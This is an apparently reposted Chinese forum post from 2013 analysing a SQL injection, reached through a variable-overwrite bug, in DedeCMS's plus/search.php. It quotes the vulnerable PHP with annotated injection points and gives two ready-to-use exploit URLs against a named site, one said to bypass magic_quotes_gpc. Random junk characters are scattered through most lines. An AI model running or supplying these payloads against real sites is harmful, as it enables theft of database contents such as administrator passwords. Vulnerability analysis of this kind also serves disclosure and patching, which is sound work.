微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
. Z/ F" q* y$ }1 }作者: c4rp3nt3r@0x50sec.org
# q, z2 z! l$ R6 g5 W Q/ MDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.4 {# H. ~0 n) F8 W: N# p8 W6 N
! M6 ]6 L+ y: D# ?# `" F
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
( f. r* A u5 d* {$ T$ r7 _8 G 6 [8 c ]" w# b$ o
============2 c# D; ]; Y1 j+ e, U/ E
5 C$ S! B, `* M' B& ]' I. y
# V% I8 F% D7 \: G; o9 u- k2 ]: yDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.& B, g4 m4 `+ S6 G
9 B8 s' ?$ H, W0 _; }- v/ M
require_once(dirname(__FILE__).”/../include/common.inc.php”);. O# Y& E3 x, F
require_once(DEDEINC.”/arc.searchview.class.php”);! p" Z+ W! s v5 Z U% O6 `( q2 U7 p
4 J# W$ g+ p) j: O: A: O$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
- \ l2 A5 D8 e% R% I# }+ w$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;0 Q4 x: O6 z/ e0 T0 Y6 N
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
3 Q/ P& @$ D1 N3 l! G: B$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;( k8 W: X& Y' e/ N
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
2 l( j: \. a* m0 w
$ f S/ r3 U. u: l9 o$ Y' J) aif(!isset($orderby)) $orderby=”;: v* Y: Z/ n. i: B2 N+ f- ?1 R
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
9 [" `# V& R9 P. V6 k/ `
% s- U- y) R& s
) c0 O( e2 f) L, `2 p* R; ?! lif(!isset($searchtype)) $searchtype = ‘titlekeyword’; j" g `$ C1 _+ x5 H
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);7 b, Q+ V9 O1 ?: Z% Y% B# @ f5 z8 y
. c R( Y; W4 ~8 E Q' }
if(!isset($keyword)){7 O' z# o+ E& F2 c' {( {0 D" W% v/ a
if(!isset($q)) $q = ”;1 q1 {$ T2 t# x2 E
$keyword=$q;
' V+ A1 ^. C8 O9 F8 J! m}" ~% u8 j' R% E: r* O$ E
; {+ U |( {& t- c% `6 {, D- L
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));6 D! }$ I% m# {9 X- r# j1 S
; I4 f! \0 g. l: }//查找栏目信息
' C5 c8 Y2 G( @. H4 G5 H3 F, `4 K$ Zif(empty($typeid))
, G' V3 {. J. S9 B$ [) {* q{) b1 v# Z3 N8 ~+ K( p! q# P: x5 e
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;" I) X, z3 g( |# K. d( w6 a' Y
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ) G+ H/ T% S% ^, I( y! j& f" L
{7 @, i6 |: D) f% @$ n8 T8 k
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);0 S5 B6 x x& J
fwrite($fp, “<”.”?php\r\n”);. P/ Y: A$ p$ }8 D& t
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);7 C' }6 O2 ~( f6 ^5 ^
$dsql->Execute();
8 {7 g5 @# K- N5 Y0 G% j& E; \( |( u while($row = $dsql->GetArray())
7 i! X( Z; b8 D2 _; t4 Y# L# D {
) R b, ]) G ^5 I# L fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
- X1 z) p6 H" {! l: m }
% F! [- _ O! n fwrite($fp, ‘?’.'>’);9 e2 G; Z6 l K) `/ ]7 ~
fclose($fp);
; @; V2 V1 `! ^/ E5 j$ S }
4 U- X7 v5 T* Z% b //引入栏目缓存并看关键字是否有相关栏目内容' L: A2 D+ }. H7 U Y
require_once($typenameCacheFile);2 U8 l* n. E4 p; c
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
) l0 ]# j! D( d4 i& _' g& k5 s; I4 q//! z3 l. Q. h/ y" K( y" T4 C
if(isset($typeArr) && is_array($typeArr))
, I/ f$ |1 c# x4 I' Y# {% l {) U E6 C6 V \0 f, j; y
foreach($typeArr as $id=>$typename)
& Y5 Q. `0 j6 I, g: I! T {
2 H1 b2 e6 M! n9 h/ F
' ?& S$ f9 b9 R4 { <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
' \* W/ @3 x! t# \+ @4 S) o if($keyword != $keywordn): V* _1 D( a) z1 V
{7 I9 `* U& C' x
$keyword = $keywordn;1 D8 r5 G1 G' c5 _; F
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
$ i8 Z2 [% f: g2 { break;/ c) y: ?/ Z" |3 A
}
& @3 [5 F, y$ f) b4 g2 ~ j) O* X }
6 @1 i# t8 F5 l+ d! g3 H( V( |; ?! S }
' z9 I! n, w) }. m/ [- s6 d8 X8 N$ k}
* D1 z: T- z" f然后plus/search.php文件下面定义了一个 Search类的对象 .9 O$ O ~# V2 `) c3 S! S) c# l
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
7 x* ]2 S1 G3 Q7 S: v" X& F$this->TypeLink = new TypeLink($typeid);
3 K4 `# [4 W# o K7 W' R" A ) r( i+ [/ S+ X. N4 @
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
$ S* L% c# k; E# E" v `. y 0 a5 ^# L1 j9 Q& |4 d! `$ R
class TypeLink7 E1 Q1 g* q( w- M& ~
{
; Z% K. p0 {9 d4 o6 u var $typeDir;
$ K5 L) d" \) t# j& i var $dsql; ^0 w2 _! @. P0 @
var $TypeID;
q' X( P) p& G* v) b, P var $baseDir;, t! v c6 r" n6 }- d+ r4 ?( n Z
var $modDir;0 i" G5 |' a( B: Y) E
var $indexUrl;; e6 U+ A8 b7 w# ^
var $indexName;
! L) P% `' c' x+ P' {: H% `9 U: h var $TypeInfos;' o1 X! l- z: Y( Y: M' r
var $SplitSymbol;& w9 [/ \- Z4 G9 X( {& x
var $valuePosition;/ B2 g4 O2 O& y
var $valuePositionName;
) Z# g$ y" [) k6 } var $OptionArrayList;//构造函数///////( z, g- C" H, O
//php5构造函数# ]0 I% R: t; E0 r
function __construct($typeid)
7 _4 A" R2 z8 r! k! }( U {
( g" a# F' c/ A7 ]; | $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];7 K& Y; \. s& a) v! J0 ~
$this->indexName = $GLOBALS['cfg_indexname'];
8 c; h% o0 @' T $this->baseDir = $GLOBALS['cfg_basedir'];
+ o& a9 g4 w5 w% t" w; y0 k2 D $this->modDir = $GLOBALS['cfg_templets_dir'];
5 ^. } {5 d8 |+ D; N+ c# S $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];; G: B( K# ~% ~
$this->dsql = $GLOBALS['dsql'];
8 b; V; \/ K) {, B& Q! { $this->TypeID = $typeid;0 S9 ]$ q) `9 Z: F/ s1 o
$this->valuePosition = ”;+ p( w- f2 V. `7 p
$this->valuePositionName = ”; f! v: t, X) o% z" `
$this->typeDir = ”;
' k' @5 Z8 U7 W; c! S# H $this->OptionArrayList = ”;+ R2 l! e2 h. H* x4 a4 C
. k; M# ~# h Y; E7 K, b0 |5 G
//载入类目信息
8 M; G6 @; [+ t% c7 B
, _& l2 ^/ J! z5 A! L( \# ^ <font color=”Red”>$query = “SELECT tp.*,ch.typename as8 k0 W5 A+ \% M+ ?5 H
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join* B4 C. q" I/ a# p8 Z
`#@__channeltype` ch, c0 O+ ~& Y' d5 ]' t- v3 |* K. m
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿4 s( \: I+ k/ e' N; r1 M- e! _
7 ~# ~! ^5 F- C5 O6 A if($typeid > 0)( [" v7 J( C4 p& C% e+ x
{
7 L6 s2 d3 \- @7 K $this->TypeInfos = $this->dsql->GetOne($query);
p" a( k6 w, M% Z/ R) M, `4 O利用代码一 需要 即使magic_quotes_gpc = Off
0 g3 p& u; t7 b " f4 x0 R0 j; f1 [
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title0 N$ ~' ?: k! m, d' {" Y8 S
! A! i- p4 @) u# i. @' h
这只是其中一个利用代码… Search 类的构造函数再往下! a5 L2 N3 f! V$ Y. o
F7 j5 d8 J) A……省略% w4 w) o2 G; f0 v) K
$this->TypeID = $typeid;
. E. {8 f$ O I& y……省略( [& M0 ], _9 i$ h/ |* o0 F
if($this->TypeID==”0″){0 ?0 m$ A- O4 @8 \) x4 M- E
$this->ChannelTypeid=1;% r& c: F+ z% \9 [; k
}else{. U' b6 L% t( v+ k& _5 {3 L
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
7 U8 U+ O) E4 T% V1 D/ U//现在不鸡肋了吧亲…6 L" i' P: E, { B9 C! R+ e0 b
$this->ChannelTypeid=$row['channeltype'];2 t/ Y) Q6 m( k3 h+ ?
4 m* e6 F" I, B: s9 G }9 p+ Y; {4 D3 Q5 p' |6 N x
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
3 b, h% G, |' K! F7 H
$ ~" _4 y& N' [7 {9 n; L9 V2 c/ z7 xwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title8 b, J1 d) J8 _/ l; @
; o' C* z) U: j# u- b% f% T6 t
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站: [! @) B) {( X. a; o) [
|
发表于 2013-1-19 08:18:56
收藏
支持
反对